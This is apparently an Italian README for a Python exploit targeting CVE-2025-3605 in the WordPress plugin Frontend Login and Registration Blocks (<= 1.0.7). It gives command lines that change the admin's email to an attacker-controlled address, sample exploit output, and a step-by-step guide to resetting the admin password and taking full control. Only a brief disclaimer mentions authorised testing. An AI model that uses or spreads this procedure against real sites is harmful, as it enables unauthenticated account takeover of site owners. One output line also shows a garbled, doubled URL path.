
WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 è vulnerabile a Privilege Escalation
Il plugin Frontend Login and Registration Blocks per WordPress (versioni <= 1.0.7) è vulnerabile a escalation di privilegi tramite takeover dell'account.
Il problema nasce dal fatto che il plugin non convalida l'identità dell'utente quando aggiorna dettagli sensibili come l'email tramite la funzione flr_blocks_user_settings_handle_ajax_callback().
✅ Impatto:
Un attaccante non autenticato può modificare l'email dell'amministratore, attivare il processo di "Password dimenticata" e reimpostare la password dell'admin, ottenendo il controllo completo.
Lo script Python incluso automatizza il processo di sfruttamento prendendo di mira l'endpoint AJAX vulnerabile:
/wp-admin/admin-ajax.php
Aggiorna l'email dell'utente bersaglio (tipicamente user_id 1 per l'admin) con un'email controllata dall'attaccante.
Nome file: CVE-2025-3605.py
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]
✅ Valori predefiniti:
--user_id: 1 (admin predefinito)--mail: [email protected]Per vedere il menu di aiuto, esegui:
python CVE-2025-3605.py --help
Risultato:
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: [email protected])
✅ Esecuzione di esempio:
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]
✅ In caso di successo:
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
❌ In caso di fallimento:
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
1️⃣ Naviga a:
http://target-site/wordpress/wp-login.php
2️⃣ Inserisci la nuova email che hai impostato ([email protected]).
3️⃣ Richiedi un reset della password.
4️⃣ Imposta una nuova password.
5️⃣ Accedi come amministratore e goditi l'accesso completo.
Questo exploit e script sono forniti solo per scopi educativi e di test autorizzati.
Qualsiasi uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha esplicita autorizzazione a testare è illegale e non etico.
Di: Khaled Alenazi (Nxploited)